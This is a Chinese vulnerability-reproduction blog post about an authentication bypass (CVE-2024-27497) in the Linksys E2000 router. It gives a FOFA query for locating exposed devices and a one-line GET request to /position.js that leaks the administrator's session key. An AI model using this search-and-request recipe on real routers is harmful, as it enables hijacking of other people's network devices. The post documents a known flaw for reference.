【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科(Cisco)品牌推出的无线路由器,它是一款支持2.4GHz和5GHz双频段的无线路由器,用户可以避开拥挤的2.4GHz频段,独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。

0x03 测绘语句

复制代码
FOFA:app="LINKSYS-E2000"

0x04 漏洞复现

复制代码
GET /position.js HTTP/1.1
复制代码
如访问 /position.js路由存在 session_key和close_session字段,则证明存在此漏洞。

0x05 影响范围

复制代码
Linksys E2000 v1.0.06

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
dalerkd6 分钟前
企业产品网络安全日志6月10日-WAF资费消耗排查
网络·安全·web安全
shawn0843 分钟前
内网有猫和无线路由器,如何做端口映射从而实现外网访问
网络·智能路由器
Gold Steps.1 小时前
JumpServer:解锁运维安全的数字 “钥匙”
运维·安全·jumpserver
云布道师2 小时前
云服务运行安全创新标杆:阿里云飞天洛神云网络子系统“齐天”再次斩获奖项
网络·人工智能·安全·阿里云·云计算·云布道师
晴天¥2 小时前
第二部分-IP及子网划分
服务器·网络·tcp/ip
wanhengidc2 小时前
高防服务器中高防和硬防之间的区别
运维·服务器·网络
wanhengidc2 小时前
服务器硬防的应用场景都有哪些?
运维·服务器·网络
KKKlucifer3 小时前
从被动响应到主动免疫:运营商行业内生安全防御系统建设
安全
马丁的代码日记3 小时前
智能合约安全专题(一):什么是重入攻击?——从 DAO 事件谈起
安全·区块链·智能合约
Digitally4 小时前
如何安全地准备 iPhone 以旧换新(分步说明)
安全·ios·iphone